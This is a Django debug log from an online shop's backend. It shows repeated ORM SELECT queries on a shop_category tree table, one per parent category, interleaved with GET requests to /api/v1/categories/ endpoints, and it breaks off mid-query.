4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:10:36,042 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:10:36,044 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:10:36,047 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:10:36,049 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:10:36,051 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:10:36,054 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:10:36,056 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:10:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:10:39,901 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 14:10:39,906 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 14:10:39] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 14:10:39,931 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:10:39,938 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:10:39,942 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:10:39,944 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:10:39,948 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:10:39,950 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:10:39,952 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:10:39,955 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:10:39,957 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:10:39,961 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:10:39,963 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:10:39,965 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:10:39,968 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:10:39,970 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:10:39,973 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:10:39,976 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:10:39,978 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:10:39,980 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:10:39,983 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:10:39,986 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:10:39,988 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:10:39,991 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:10:39,993 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:10:39,995 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:10:39,997 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:10:40,001 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:10:40,003 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:10:40,006 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:10:40,008 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:10:40,010 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:10:40,014 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:10:40,016 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:10:40,018 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:10:40,020 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:10:40,022 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:10:40,026 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:10:40,028 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:10:40,031 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:10:40,033 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:10:40,035 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:10:40,037 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:10:40,040 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:10:40,042 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:10:40,045 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:10:40,047 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:10:40,050 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:10:40] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:10:45,209 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:10:45,216 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:10:45,219 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 14:10:45,222 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:10:45,224 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:10:45,227 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:10:45,231 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [19/Dec/2019 14:10:45] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 14:10:45,234 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:10:45,238 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:10:45,241 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:10:45,244 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:10:45,247 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 